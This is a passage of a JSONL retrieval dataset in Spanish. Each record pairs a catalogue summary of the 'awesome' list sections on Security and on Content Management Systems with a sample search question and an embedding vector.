0.01913, 0.03526, 0.01953, 0.03326, -0.00483, -0.00652, -0.00939, 0.03281, 0.09409, -0.03244, -0.09867, -0.0739, 0.01176, -0.1124, -0.03601, -0.02906, -0.03248, -0.08694, 0.02562, 0.01121, 0.04936, -0.03036, 0.04005]} +{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Application Security. Security. CTF β€” Capture The Flag. Cyber Security University β€” Free educational resources that focus on learning by doing. Malware Analysis. Android Security. Hacking. Hacking Spots. Honeypots β€” Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization. Incident Response. Vehicle Security and Car Hacking. Web Security β€” Security of web apps & services. Lockpicking β€” The art of unlocking a lock by manipulating its components without the key. Cybersecurity Blue Team β€” Groups of individuals who identify security flaws in information technology systems. Fuzzing β€” Automated software testing technique that involves feeding pseudo-randomly generated input data. Embedded and IoT Security. GDPR β€” Regulation on data protection and privacy for all individuals within EU. DevSecOps β€” Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps). Executable Packing β€” Packing and unpacking executable formats.", "indexar": "que herramienta sirve para analizar malware", "v": [-0.02805, 0.08591, -0.13101, -0.20774, -0.10757, -0.0456, -0.06895, 0.02059, -0.10997, -0.03227, 0.03652, -0.07445, 0.07483, -0.08523, 0.07608, 0.07015, 0.03914, -0.1364, 0.02301, 0.03959, 0.03863, -0.10432, -0.11694, -0.04947, -0.14771, 0.07795, -0.00279, -0.01833, -0.13823, -0.01277, -0.02187, 0.0305, 0.03583, -0.13011, -0.0972, 0.0076, -0.05159, -0.03108, 0.01273, 0.12223, 0.05959, -0.00678, -0.11313, 0.01322, 0.00594, -0.00063, -0.08304, -0.00796, 0.06254, 0.13414, 0.00347, -0.11233, -0.09497, 0.03463, 0.0398, -0.13447, 0.04986, -0.12929, 0.08657, -0.13933, -0.08997, 0.0754, -0.04099, 0.00127, -0.05533, -0.02699, 0.06026, -0.0014, -0.06835, 0.0582, -0.05118, 0.06956, -0.00607, -0.03299, -0.0893, -0.03597, -0.02017, 0.13874, 0.08668, -0.04795, 0.11298, 0.03222, -0.05097, 0.0413, -0.14801, -0.04185, 0.04256, -0.04374, 0.05231, -0.11, -0.00169, 0.10655, 0.00039, 0.07383, 0.00593, 0.0057, 0.16146, -0.04226, 0.00944, 0.05247, 0.12843, -0.07938, -0.08641, 0.11884, -0.02787, 0.0664, -0.08627, -0.02079, -0.03978, -0.00252, -0.00557, 0.01543, 0.03293, -0.028, 0.01221, -0.06592, -0.04736, -0.03765, -0.02029, -0.10781, 0.02327, 0.00708, -0.11706, 0.04116, -0.07372, -0.02906, -0.00229, 0.05173, -0.00762, -0.11274, 0.03362, -0.04076, -0.12635, 0.03994, -0.12853, 0.01229, 0.01676, -0.13323, -0.0425, -0.01989, 0.05918, 0.1232, -0.01753, -0.02801, -0.00523, 0.02628, 0.00865, -0.05286, -0.03674, -0.00488, 0.05425, -0.00633, -0.02217, 0.06036, -0.02823, 0.01893, -0.09941, -0.00092, -0.06648, 0.05327, -0.02407, -0.02682, 0.09388, 0.01764, -0.01448, -0.0221, 0.06228, 0.00203, 0.07825, 0.05916, -0.00838, 0.0358, 0.07608, -0.11196, -0.00717, -0.09662, 0.02056, -0.02431, -0.04704, -0.09793, -0.02182, -0.03173, 0.0285, -0.04165, -0.0451, -0.01987, 0.0351, 0.01609, 0.00736, 0.03429, -0.01983, 0.04061, -0.02511, -0.06306, 0.04992, -0.00238, -0.04156, -0.06408, 0.05201, 0.00532, -0.0568, -0.01142, -0.03342, -0.01945, 0.01609, 0.12223, 0.00129, -0.02483, -0.04376, 0.05791, 0.03825, 0.00805, 0.00206, -0.05222, -0.00886, -0.04328, -0.0058, 0.06617, -0.01269, 0.04327, -0.00737, 0.01412, 0.07796, -0.04687, -0.02982, 0.02353, -0.03122, 0.00678, 0.04493, -0.02419, 0.00589, 0.0004, -0.02631, -0.01026, -0.0012, -0.05116, 0.01379, -0.05836, -0.04254, -0.02949, -0.02026, 0.02079, -0.01988, -0.06775, -0.02625, -0.06534, 0.00897, -0.04324, -0.01358, -0.05388, -0.04671, 0.01134, 0.02372, -0.02422, 0.01928, -0.03605]} +{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Application Security. Security. CTF β€” Capture The Flag. Cyber Security University β€” Free educational resources that focus on learning by doing. Malware Analysis. Android Security. Hacking. Hacking Spots. Honeypots β€” Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization. Incident Response. Vehicle Security and Car Hacking. Web Security β€” Security of web apps & services. Lockpicking β€” The art of unlocking a lock by manipulating its components without the key. Cybersecurity Blue Team β€” Groups of individuals who identify security flaws in information technology systems. Fuzzing β€” Automated software testing technique that involves feeding pseudo-randomly generated input data. Embedded and IoT Security. GDPR β€” Regulation on data protection and privacy for all individuals within EU. DevSecOps β€” Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps). Executable Packing β€” Packing and unpacking executable formats.", "indexar": "cual es una alternativa libre a CTF", "v": [-0.14255, -0.00854, -0.02156, 0.09088, -0.05459, -0.0946, 0.03429, 0.0549, -0.12902, 0.05574, -0.03891, -0.17033, -0.08035, 0.1028, 0.11868, -0.04503, 0.07197, -0.1692, 0.18978, -0.06298, -0.05913, -0.09212, -0.11141, -0.14721, -0.01338, -0.05108, -0.03201, -0.02429, -0.06812, -0.04979, 0.17705, -0.02966, 0.17497, 0.09398, 0.08145, 0.10101, 0.13751, 0.05369, -0.00082, -0.07725, 0.01102, -0.08813, -0.08347, 0.09225, 0.0378, -0.11577, -0.09341, -0.00038, 0.00579, 0.09647, -0.01314, -0.04779, -0.04117, -0.00901, 0.00434, 0.01599, 0.0503, -0.08763, -0.08891, -0.03415, -0.04719, 0.09384, 0.00839, -0.0183, -0.00694, 0.03539, -0.07302, 0.03728, -0.05126, 0.02839, 0.04579, -0.02273, -0.0084, -0.10017, -0.12022, 0.0607, -0.08299, -0.0698, 0.06742, 0.01036, 0.02617, -0.04971, -0.02145, 0.04653, 0.05709, -0.03134, 0.16966, -0.09243, -0.03806, 0.11079, 0.01243, 0.04311, -0.03101, 0.15258, 0.01195, -0.09005, 0.04416, 0.05156, -0.00336, 0.06023, 0.1154, 0.07413, -0.11774, 0.00405, -0.0027, -0.04877, 0.01898, 0.02641, -0.11336, 0.04025, 0.01208, 0.0888, -0.01147, 0.01127, -0.01461, -0.07006, -0.03713, -0.01315, 0.03041, 0.0353, -0.0386, -0.0259, -0.09719, -0.11286, 0.0395, 0.10491, 0.04044, 0.03443, -0.11222, 0.03183, 0.05103, 0.00678, -0.04141, -0.10688, -0.10296, -0.09921, 0.05877, -0.02325, 0.03498, 0.03948, -0.01047, 0.04371, 0.02392, -0.04205, 0.06786, -0.04622, -0.0046, -0.03275, -0.00261, -0.03248, -0.03273, 0.0141, 0.035, 0.10443, -0.0429, 0.01791, -0.0297, 0.00104, -0.06792, 0.08106, 0.05556, -0.02492, 0.00053, -0.04103, 0.00431, -0.02306, -0.00255, -0.03691, -0.08195, 0.00887, 0.00291, 0.05629, 0.06152, -0.05068, 0.03549, -0.0825, 0.01682, -0.08237, 0.04556, -0.01052, 0.03562, 0.04191, -0.06097, 0.01819, -0.00095, -0.07303, 0.02181, 0.03935, 0.03886, -0.00464, -0.01296, 0.04593, -0.0687, -0.13353, -0.03489, 0.01892, 0.04364, -0.10222, 0.0159, -0.03016, -0.08412, -0.01117, 0.0061, -0.03719, 0.01691, -0.01477, 0.0392, 0.03568, -0.01623, 0.07057, 0.04896, -0.00054, 0.05739, -0.00121, -0.05844, 0.01725, -0.00501, -0.02163, -0.0159, 0.00963, 0.04757, 0.00321, 0.03108, 0.01369, -0.00502, 0.02356, 0.00429, 0.03796, -0.00962, 0.03345, 0.03947, -0.00448, -0.02018, 0.04923, 0.06347, 0.0103, 0.01878, 0.01639, 0.00611, -0.0074, 0.06343, 0.05875, -0.04011, 0.04041, -0.00904, -0.01366, -0.04479, -0.02519, -0.07104, -0.05515, -0.0204, 0.03564, 0.01992, 0.00095, 0.02583, 0.0053]} +{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Application Security. Security. CTF β€” Capture The Flag. Cyber Security University β€” Free educational resources that focus on learning by doing. Malware Analysis. Android Security. Hacking. Hacking Spots. Honeypots β€” Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization. Incident Response. Vehicle Security and Car Hacking. Web Security β€” Security of web apps & services. Lockpicking β€” The art of unlocking a lock by manipulating its components without the key. Cybersecurity Blue Team β€” Groups of individuals who identify security flaws in information technology systems. Fuzzing β€” Automated software testing technique that involves feeding pseudo-randomly generated input data. Embedded and IoT Security. GDPR β€” Regulation on data protection and privacy for all individuals within EU. DevSecOps β€” Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps). Executable Packing β€” Packing and unpacking executable formats.", "indexar": "con que puedo hacer un honeypot", "v": [-0.13012, 0.072, -0.1383, 0.05036, -0.0791, 0.11184, -0.05724, 0.14724, -0.14798, -0.07992, -0.05517, 0.10126, 0.15627, -0.00861, -0.08906, 0.08944, 0.14287, 0.03234, -0.05985, 0.05234, -0.07596, 0.03709, -0.20756, 0.00403, 0.07506, 0.03203, 0.14353, 0.27793, -0.09608, -0.00977, -0.04354, -0.06466, -0.19065, 0.15985, -0.15994, 0.02281, -0.02218, 0.03969, 0.10152, -0.06636, -0.04895, -0.09049, 0.01675, 0.0029, -0.03875, 0.15111, -0.0322, -0.11938, -0.10709, -0.07858, -0.02186, -0.12433, -0.06575, 0.05385, 0.01242, -0.03154, -0.09174, -0.01916, -0.09059, -0.0838, 0.04636, -0.10652, 0.0194, -0.02521, -0.0856, 0.08289, -0.03065, 0.03443, 0.05372, 0.11775, -0.07629, 0.04358, 0.05822, 0.00586, -0.05168, 0.00917, -0.05259, -0.03477, 0.00939, -0.00328, -0.03231, 0.07117, 0.02716, 0.0099, 0.05511, -0.08262, 0.01667, -0.00776, 0.05248, -0.06626, 0.01307, -0.00019, -0.02013, -0.01192, -0.05957, 0.01067, 0.00603, -0.04336, -0.11168, 0.02518, 0.03491, 0.0424, -0.02263, 0.10917, -0.01027, 0.0467, 0.09378, 0.08657, -0.01935, -0.01813, 0.01624, 0.00053, -0.05136, 0.01821, 0.00079, 0.02819, -0.01776, 0.02408, -0.01335, -0.0138, -0.08032, -0.08813, -0.05798, 0.03642, 0.04446, -0.05481, 0.02453, 0.05145, -0.02409, 0.0563, -0.09004, 0.12453, 0.01208, -0.11079, 0.04601, -0.0032, 0.01708, -0.05941, 0.05779, 0.02041, -0.02648, 0.02989, -0.0477, -0.02686, 0.01036, 0.01691, -0.0266, -0.032, 0.01185, -0.10924, 0.0431, 0.04796, 0.07152, 0.01805, -0.03013, 0.02284, 0.06188, -0.00662, 0.06084, 0.05291, -0.01096, 0.06974, -0.0843, 0.02054, 0.02777, 0.02971, -0.01702, -0.06522, -0.02965, -0.00111, -0.06093, 0.04013, 0.07497, 0.01957, 0.06729, 0.01741, -0.03289, -0.06467, -0.0322, -0.04969, 0.01051, -0.03012, -0.03924, 0.04409, 0.01938, 0.05379, 0.03858, -0.00856, 0.01392, 0.10176, -0.06867, 0.01843, 0.03086, 0.0253, 0.07257, 0.03026, 0.06225, 0.06248, 0.00928, -0.02884, -0.01274, 0.02726, 0.05748, -0.01391, 0.0101, 0.00195, -0.00351, 0.03897, 0.03152, 0.02314, 0.03061, 0.02422, 0.0429, 0.00233, -0.04135, -0.08073, 0.01668, -0.00333, -0.01597, -0.00064, 0.07238, 0.00609, -0.01446, 0.06541, -0.05664, 0.08029, 0.02711, -0.03226, -0.00679, 0.02263, -0.01246, 0.01103, -0.01868, 0.00308, 0.0065, -0.01936, -0.01244, -0.03875, -0.05383, 0.03571, -0.03941, 0.00131, 0.00454, 0.01979, -0.01571, -0.03838, -0.05157, 0.0183, -0.0241, -0.0013, -0.0337, 0.00015, 0.0353, 0.03325, -0.00408, -0.01422]} +{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Malware Persistence β€” Techniques that adversaries use to keep access to systems across restarts. EVM Security β€” Understanding the Ethereum Virtual Machine security ecosystem. Password Cracking β€” The process of recovering passwords from data that has been stored in or transmitted by a system in scrambled form. Security Card Games β€” Train your skills and discuss various security topics. Suricata β€” Intrusion detection/prevention system and network security monitoring engine. Prompt Injection β€” A type of vulnerability that specifically targets machine learning models. Detection Engineering β€” Design, build, and operate detective cybersecurity controls. Annual Security Reports β€” Exploring cybersecurity trends, insights, and challenges. CI/CD Attacks β€” Offensive research of systems and processes related to developing and deploying code. OpenID Connect β€” Identity standard and authentication protocol built on OAuth 2.0 for user identity assertion.", "indexar": "que tecnica de persistencia usen los atacantes para mantener acceso al sistema tras un reinicio?", "v": [-0.00858, 0.00382, -0.16563, -0.15023, 0.13743, 0.01694, -0.14387, -0.15424, -0.11038, 0.13755, -0.15667, -0.03032, -0.06194, 0.05076, 0.14272, -0.0138, -0.02753, 0.02511, 0.18401, -0.01056, -0.05767, -0.04834, 0.02836, 0.03033, 0.02928, 0.0254, 0.07831, -0.12191, -0.07622, -0.10545, -0.0215, -0.05706, 0.00916, 0.00026, 0.01735, -0.07093, -0.08141, 0.13059, 0.17835, 0.1547, -0.02431, -0.06837, -0.06954, -0.12427, 0.20433, -0.02569, 0.07945, 0.03376, -0.01749, 0.01359, 0.00185, 0.05446, -0.05212, -0.11139, -0.10751, -0.08994, 0.10933, -0.02052, -0.03871, -0.07701, -0.01086, 0.04169, 0.10631, -0.0099, 0.08874, -0.04769, -0.08884, -0.06837, -0.06762, 0.08282, -0.00304, 0.05789, 0.00693, 0.02672, -0.07925, 0.13324, -0.0136, 0.09576, 0.07483, 0.01298, -0.13313, 0.02444, -0.08033, 0.05308, 0.01517, -0.0975, 0.0677, -0.04299, -0.065, -0.11598, 0.06329, -0.10655, 0.00494, 0.00537, 0.00273, 0.03026, -0.07986, -0.00698, -0.03597, -0.01007, -0.03046, -0.03294, -0.03139, 0.04984, 0.04683, -0.00983, 0.10099, -0.08782, -0.00225, -0.08322, -0.09461, -0.03633, -0.07419, -0.01061, -0.00236, -0.04085, -0.08143, -0.0082, -0.03802, -0.04797, 0.00128, 0.05154, 0.01026, 0.03748, 0.03153, -0.01767, -0.03195, -0.05264, -0.03724, -0.02272, 0.00083, -0.02144, -0.06021, 0.06005, -0.06142, 0.0184, 0.04337, 0.02275, -0.08158, 0.08789, 0.03739, 0.11487, -0.02576, -0.00686, 0.02041, -0.02835, 0.04297, -0.06527, -0.09762, -0.00524, -0.05839, 0.0761, -0.00602, 0.00925, -0.03628, 0.01194, 0.02939, -0.05924, -0.03062, 0.0633, 0.00193, 0.00168, -0.04854, -0.06539, -0.03952, -0.0111, 0.00561, -0.0901, 0.05278, 0.01223, -0.01539, 0.02315, 0.03138, -0.04145, -0.03867, -0.02208, -0.07499, -0.11388, 0.03405, 0.0139, -0.04127, -0.04714, -0.00297, 0.01552, -0.02133, -0.00686, -0.02496, 0.04499, 0.01006, 0.03696, 0.01212, 0.01699, -0.01551, 0.09615, -0.00782, -0.09093, -0.05102, -0.04969, 0.01321, 0.09377, -0.04073, 0.01432, -0.00271, -0.03804, 0.03821, 0.03809, -0.0162, -0.04839, -0.05244, 0.00735, 0.01049, -0.00984, 0.04211, -0.02511, -0.05158, -0.03933, -0.01399, -0.00963, 0.00752, -0.05835, 0.08498, 0.04073, 0.0217, 0.0545, 0.0156, -0.09596, -0.03528, 0.00324, -0.00955, -0.0749, 0.02768, -0.04609, 0.05868, -0.05728, 0.00885, -0.0334, -0.01599, -0.01107, -0.0343, -0.02672, 0.03918, 0.04758, -0.00952, 0.01992, -0.01531, -0.07424, -0.05104, -0.02398, -0.01379, -0.02751, -0.00903, 0.01356, 0.01356, -0.01214, 0.04501, -0.0541]} +{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Malware Persistence β€” Techniques that adversaries use to keep access to systems across restarts. EVM Security β€” Understanding the Ethereum Virtual Machine security ecosystem. Password Cracking β€” The process of recovering passwords from data that has been stored in or transmitted by a system in scrambled form. Security Card Games β€” Train your skills and discuss various security topics. Suricata β€” Intrusion detection/prevention system and network security monitoring engine. Prompt Injection β€” A type of vulnerability that specifically targets machine learning models. Detection Engineering β€” Design, build, and operate detective cybersecurity controls. Annual Security Reports β€” Exploring cybersecurity trends, insights, and challenges. CI/CD Attacks β€” Offensive research of systems and processes related to developing and deploying code. OpenID Connect β€” Identity standard and authentication protocol built on OAuth 2.0 for user identity assertion.", "indexar": "cual es una buena herramienta para detectar intrusiones y monitorear la seguridad de red?", "v": [-0.0044, 0.03537, -0.14022, -0.22251, 0.06085, -0.09873, -0.17164, 0.02519, 0.03677, -0.0497, -0.10272, -0.03006, -0.08357, -0.06954, 0.10046, 0.05721, 0.01025, -0.07131, 0.00944, -0.04461, -0.01323, -0.01143, -0.0494, 0.03174, -0.03342, 0.07664, -0.04977, -0.03536, -0.02667, 0.0006, -0.02226, -0.05662, 0.07829, 0.03416, -0.19627, -0.06649, 0.02027, -0.02366, 0.02981, 0.13671, -0.02009, 0.04558, -0.02293, -0.04869, 0.20566, -0.05779, -0.01661, 0.02588, 0.05058, 0.00993, -0.05606, -0.00143, -0.11581, -0.07243, 0.04268, -0.17098, 0.13207, 0.03752, 0.10847, -0.13235, -0.1612, 0.00923, -0.06063, -0.01626, -0.01415, -0.09512, 0.01525, -0.05979, -0.02405, -0.01683, 0.0593, -0.00642, -0.04214, 0.04667, 0.05329, -0.04778, -0.00945, 0.01534, 0.14874, -0.00176, -0.02456, 0.06659, -0.03025, 0.04069, -0.09872, -0.10701, 0.04336, -0.08106, -0.06457, -0.04068, 0.03699, 0.10578, 0.03335, 0.03201, 0.06773, -0.02452, 0.11032, -0.01972, -0.10336, -0.02866, 0.07972, -0.07257, -0.05732, 0.06928, 0.0216, 0.02789, -0.0997, 0.0306, 0.02522, -0.13393, 0.00463, 0.02621, -0.03451, -0.04023, -0.01606, 0.00142, -0.01574, -0.03016, 0.04479, -0.02971, -0.02754, -0.0365, -0.11405, -0.02894, 0.08452, -0.09722, -0.04029, 0.01626, -0.03424, -0.04318, 0.00551, -0.06228, -0.08301, -0.06336, -0.08839, 0.00201, -0.05167, -0.1908, -0.08836, 0.00232, 0.01909, 0.05759, 0.02333, -0.04953, 0.03222, 0.12188, 0.01092, 0.01029, -0.06847, 0.08306, -0.02117, 0.04234, -0.04343, 0.00999, 0.01769, 0.09193, -0.01556, 0.01911, -0.03933, 0.09582, 0.02134, -0.02239, 0.07796, 0.03106, -0.01215, -0.0262, 0.06803, -0.02624, 0.11491, -0.01868, -0.0322, 0.04898, 0.03569, -0.08822, -0.05018, -0.073, -0.05652, -0.07516, 0.02805, -0.11252, 0.00797, 0.02298, -0.03307, -0.01293, 0.05171, -0.05959, 0.03871, 0.01234, 0.02792, 0.03718, 0.06378, -0.01039, -0.0596, 0.01494, 0.05243, 0.00929, 0.01097, -0.09367, 0.00865, 0.00863, -0.04384, -0.03023, 0.01129, -0.03815, 0.04899, 0.02197, -0.00242, 0.01262, 0.02989, 0.03912, 0.05728, 0.01926, 0.02046, -0.04579, -0.09492, 0.00998, 0.00711, 0.05778, -0.0763, 0.01547, 0.08717, 0.0136, 0.04603, 0.00215, -0.06145, -0.01699, 0.00892, 0.0346, 0.04857, -0.04554, 0.0098, -0.03087, -0.05139, -0.02581, -0.00312, -0.08062, 0.02827, -0.01186, -0.01599, -0.04694, -0.00916, 0.03843, 0.00042, -0.05089, -0.02267, -0.04578, -0.02713, 0.02366, 0.00251, -0.0936, -0.02281, 0.04224, 0.04672, -0.08495, 0.05056, -0.03683]} +{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Malware Persistence β€” Techniques that adversaries use to keep access to systems across restarts. EVM Security β€” Understanding the Ethereum Virtual Machine security ecosystem. Password Cracking β€” The process of recovering passwords from data that has been stored in or transmitted by a system in scrambled form. Security Card Games β€” Train your skills and discuss various security topics. Suricata β€” Intrusion detection/prevention system and network security monitoring engine. Prompt Injection β€” A type of vulnerability that specifically targets machine learning models. Detection Engineering β€” Design, build, and operate detective cybersecurity controls. Annual Security Reports β€” Exploring cybersecurity trends, insights, and challenges. CI/CD Attacks β€” Offensive research of systems and processes related to developing and deploying code. OpenID Connect β€” Identity standard and authentication protocol built on OAuth 2.0 for user identity assertion.", "indexar": "como entiendo el ecosistema de seguridad del Ethereum Virtual Machine?", "v": [0.00371, -0.03144, -0.10733, -0.06773, 0.05293, 0.02839, -0.09353, -0.01801, 0.06701, -0.10408, -0.19576, 0.03151, -0.02606, 0.01301, 0.11902, 0.08292, 0.11071, -0.1259, 0.0532, -0.03046, -0.01606, 0.03116, -0.06915, -0.05655, 0.11457, 0.07743, -0.25676, 0.18051, 0.00666, 0.10456, 0.14259, 0.12231, 0.01652, -0.02584, -0.01077, 0.00484, 0.0713, 0.0145, -0.03553, -0.07308, 0.06446, 0.00739, 0.10227, -0.08554, 0.05105, -0.04877, 0.00556, -0.11994, 0.20823, -0.13224, -0.19205, 0.06538, -0.22947, -0.04674, 0.13711, -0.01329, 0.14599, -0.09098, 0.10974, 0.02753, -0.08583, -0.01922, 0.04423, 0.05662, -0.03408, 0.00066, -0.04456, 0.11442, -0.10713, 0.06538, -0.03586, -0.01854, 0.03517, 0.02676, 0.06651, 0.00615, 0.00825, -0.0061, 0.04954, 0.08578, -0.05437, -0.01653, 0.01184, 0.06107, -0.08942, -0.03049, 0.01741, -0.0284, 0.06029, 0.01394, -0.03533, 0.10112, 0.01432, -0.03124, 0.05248, -0.03023, -0.03549, 0.03105, -0.01488, -0.04003, 0.00328, -0.02804, -0.02243, 0.02142, -0.0356, 0.01493, 0.05611, -0.07319, 0.01154, -0.10823, -0.04837, -0.01674, 0.00187, 0.02269, -0.02895, -0.03387, 0.00443, 0.03684, 0.10531, -0.01714, 0.03669, 0.02262, 0.01729, -0.03801, 0.04542, -0.01473, -0.05509, 0.10346, 0.04778, -0.05807, -0.03903, 0.02642, -0.09362, 0.05592, -0.03096, 0.05284, 0.02984, -0.05847, -0.01244, -0.05031, 0.05741, 0.09678, 0.02202, -0.02999, 0.04092, -0.04973, 0.03106, -0.07572, -0.02128, -0.01705, 0.08251, 0.02055, -0.07893, 0.04315, -0.07793, -0.00921, -0.12251, -0.08042, -0.05915, 0.05401, 0.07203, -0.02524, 0.01885, 0.00035, -0.06519, -0.00459, 0.06538, -0.01787, 0.03371, 0.00348, -0.00253, -0.00433, 0.02238, -0.07303, 0.02191, -0.00805, -0.01929, -0.0261, 0.09365, -0.00792, -0.05553, -0.00979, -0.01664, 0.0394, -0.02011, -0.00146, 0.04056, 0.0143, -0.04931, 0.09007, 0.00502, 0.00418, -0.09342, 0.0157, 0.00588, -0.05517, -0.03955, -0.01519, -0.01588, -0.03695, 0.02656, 0.04023, -0.01686, -0.02857, 0.03847, 0.08626, -0.00655, -0.01451, -0.05635, 0.009, 0.05241, 0.00438, 0.02547, 0.0082, 0.02056, 0.02189, 0.04886, 0.04519, -0.018, -0.0216, 0.0075, 0.03735, 0.01858, -0.02584, -0.00878, -0.002, -0.01556, 0.02409, 0.04399, 0.00677, -0.01392, -0.00291, -0.06769, -0.008, 0.01205, 0.076, 0.05331, 0.00393, -0.08011, -0.03841, 0.01451, 0.03643, -0.03561, -0.0771, -0.02657, -0.02349, -0.05461, 0.03503, -0.02709, -0.07969, -0.05243, 0.01708, 0.01975, -0.02145, -0.0377, -0.02391]} +{"tipo": "pregunta", "herramienta": "Content Management Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Content Management Systems", "tema": "content management systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Content Management Systems: Umbraco. Refinery CMS β€” Ruby on Rails CMS. Wagtail β€” Django CMS focused on flexibility and user experience. Textpattern β€” Lightweight PHP-based CMS. Drupal β€” Extensible PHP-based CMS. Craft CMS β€” Content-first CMS. Sitecore β€” NET digital marketing platform that combines CMS with tools for managing multiple websites. Silverstripe CMS β€” PHP MVC framework that serves as a classic or headless CMS. Directus β€” A real-time API and app dashboard for managing SQL database content. Plone β€” Open source Python CMS. Payload β€” Next.js native and open source headless CMS.", "indexar": "con quΓ© puedo montar un sitio web con un panel de administraciΓ³n fΓ‘cil?", "v": [-0.04639, 0.15337, -0.1541, -0.15355, -0.16988, -0.02305, 0.05004, -0.01369, -0.18959, -0.08464, -0.12079, -0.02335, 0.05429, -0.02338, 0.03491, 0.11043, 0.09501, -0.1021, 0.07659, -0.0271, -0.03949, -0.04194, -0.02265, -0.01569, -0.01447, 0.00666, 0.10676, -0.10993, -0.09748, 0.00839, 0.03844, 0.11149, -0.00191, 0.07706, -0.02699, -0.00441, 0.07317, 0.11063, 0.00818, -0.04174, -0.11197, -0.07907, -0.05919, 0.09513, -0.04911, 0.0125, 0.00096, -0.16159, 0.02856, -0.06494, 0.00058, -0.12028, -0.11419, 0.04042, 0.04293, 0.03957, 0.09906, -0.12058, 0.13546, -0.01877, -0.09441, 0.15014, -0.06573, 0.10798, -0.04955, 0.04489, -0.03466, 0.05659, -0.04126, 0.01184, 0.09172, -0.10896, 0.03371, -0.0411, 0.01857, 0.06308, -0.03302, 0.0173, 0.02192, 0.0154, 0.01354, 0.00786, -0.09872, 0.12087, -0.15047, -0.08151, -0.0959, -0.15594, -0.0266, -0.02011, 0.0382, -0.01371, 0.00729, -0.06809, -0.0706, -0.11101, 0.03609, 0.02767, -0.00623, -0.01464, -0.01186, 0.01674, -0.02195, 0.12403, 0.06333, 0.08463, 0.03146, -0.04041, -0.0062, -0.05869, 0.04988, 0.03147, -0.12385, 0.05493, -0.06311, -0.06327, -0.08124, 0.11041, -0.0667, -0.06071, -0.03215, 0.0024, 0.03293, 0.01026, 0.04113, -0.00174, 0.16696, 0.11791, -0.08618, -0.03186, 0.05125, -0.07874, -0.01553, 0.01541, 0.00579, 0.06784, -0.05267, 0.00587, -0.01582, 0.00843, 0.0265, -0.04099, -0.04309, -0.02791, 0.01826, -0.05519, 0.00582, -0.01919, 0.0028, 0.05155, -0.0178, 0.10712, 0.08559, 0.03268, -0.0467, -0.03358, 0.01226, -0.02317, 0.04136, 0.00252, -0.04805, 0.03513, 0.03549, 0.05875, 0.02994, 0.03521, -0.11323, 0.06844, 0.04633, 0.02164, -0.00873, 0.10337, 0.00568, -0.05972, 0.08611, 0.01814, -0.04153, -0.03779, 0.05775, -0.05748, -0.02356, -0.02735, -0.03983, 0.09547, -0.03939, 0.0019, 0.02215, 0.00107, -0.01393, 0.09631, 0.03135, 0.01348, -0.06583, 0.01243, 0.07649, 0.01169, 0.02395, 0.01125, 0.00492, -0.01763, -0.00476, -0.02839, 0.04886, -0.0341, -0.05644, 0.03435, -0.03094, 0.04933, 0.04119, 0.05403, 0.02646, 0.02391, 0.01541, -0.06581, -0.00592, -0.03687, 0.04775, -0.02255, -0.04429, 0.01753, 0.05508, 0.04458, 0.02293, 0.05728, 0.07921, -0.00385, -0.00538, 0.02528, -0.01496, 0.03122, -0.04979, 0.01321, 0.0095, 0.00783, -0.00888, -0.02989, 0.03563, -0.00072, -0.06519, 0.04457, 0.00932, 0.05283, -0.00223, -0.00841, 0.01331, -0.05567, -0.02444, 0.0166, -0.04887, -0.0184, -0.05188, -0.04711, -0.03117, -0.00819, -0.05066, 0.01872]} +{"tipo": "pregunta", "herramienta": "Content Management Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Content Management Systems", "tema": "content management systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Content Management Systems: Umbraco. Refinery CMS β€” Ruby on Rails CMS. Wagtail β€” Django CMS focused on flexibility and user experience. Textpattern β€” Lightweight PHP-based CMS. Drupal β€” Extensible PHP-based CMS. Craft CMS β€” Content-first CMS. Sitecore β€” NET digital marketing platform that combines CMS with tools for managing multiple websites. Silverstripe CMS β€” PHP MVC framework that serves as a classic or headless CMS. Directus β€” A real-time API and app dashboard for managing SQL database content. Plone β€” Open source Python CMS. Payload β€” Next.js native and open source headless CMS.", "indexar": "quΓ© alternativas hay para gestionar contenido si uso PHP o Ruby?", "v": [-0.18306, -0.00543, -0.09128, -0.192, 0.00768, -0.06782, -0.04819, -0.06362, -0.02141, -0.09158, -0.06704, -0.12048, 0.08435, 0.03973, 0.00793, -0.05047, -0.12024, 0.02581, 0.00262, -0.03664, -0.04893, -0.0172, -0.19092, -0.02927, -0.02765, -0.03213, 0.09976, 0.00842, -0.0079, -0.03435, 0.1895, 0.06018, -0.0406, -0.00315, -0.22948, 0.12886, 0.03884, -0.02348, -0.05423, 0.02542, 0.06461, -0.02779, -0.11284, 